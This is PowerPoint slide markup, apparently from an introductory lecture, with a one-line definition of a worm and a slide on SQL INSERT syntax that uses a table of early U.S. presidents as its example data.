              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Type of malware able to propagate on its own</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162824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Structured Query Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="1569660"/>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INSERT INTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>col1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>col2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>col3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) VALUES (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>val1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>val2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>val3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>INSERT INTO presidents (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lastname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    VALUES (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Benjamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Franklin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2136B971-034C-46D7-883D-9A1C051A5768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="661163206"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1313487" y="3423377"/>
          <a:ext cx="9589088" cy="2595880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{D7AC3CCA-C797-4891-BE02-D94E43425B78}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1136301">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3552698260"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1481360">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1168334998"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1556201">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="164526466"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2218864">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="95918760"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1598181">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1457510397"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1598181">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3623328670"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>num</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>firstname</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>lastname</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>hometown</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>birthday</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>hiredate</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2394002928"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>George</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Washington</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Popes Creek, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FEB-22-1732</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-30-1789</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1677156271"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>John</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Adams</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Braintree, MA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>OCT-30-1735</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1797</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3244139392"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Thomas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Jefferson</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Shadwell, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-13-1743</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1801</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3743850534"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>James</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Madison</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Port Conway, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
